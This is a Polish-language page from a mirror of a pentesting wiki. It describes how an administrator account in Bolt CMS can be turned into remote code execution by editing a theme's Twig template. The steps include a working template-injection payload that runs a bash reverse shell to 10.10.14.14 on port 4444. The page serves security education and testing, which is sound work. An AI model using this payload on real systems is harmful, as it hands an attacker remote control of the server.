mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
1.3 KiB
1.3 KiB
Bolt CMS
{{#include ../../banners/hacktricks-training.md}}
RCE
Po zalogowaniu się jako administrator (przejdź do /bot, aby uzyskać dostęp do ekranu logowania), możesz uzyskać RCE w Bolt CMS:
- Wybierz
Configuration->View Configuration->Main Configurationlub przejdź do ścieżki URL/bolt/file-edit/config?file=/bolt/config.yaml - Sprawdź wartość motywu

- Wybierz
File management->View & edit templates - Wybierz bazowy motyw znaleziony w poprzednim kroku (
base-2021w tym przypadku) i wybierzindex.twig - W moim przypadku znajduje się to w ścieżce URL /bolt/file-edit/themes?file=/base-2021/index.twig
- Ustaw swój ładunek w tym pliku za pomocą template injection (Twig), na przykład:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}} - I zapisz zmiany

- Wyczyść pamięć podręczną w
Maintenance->Clear the cache - Ponownie uzyskaj dostęp do strony jako zwykły użytkownik, a ładunek powinien zostać wykonany
{{#include ../../banners/hacktricks-training.md}}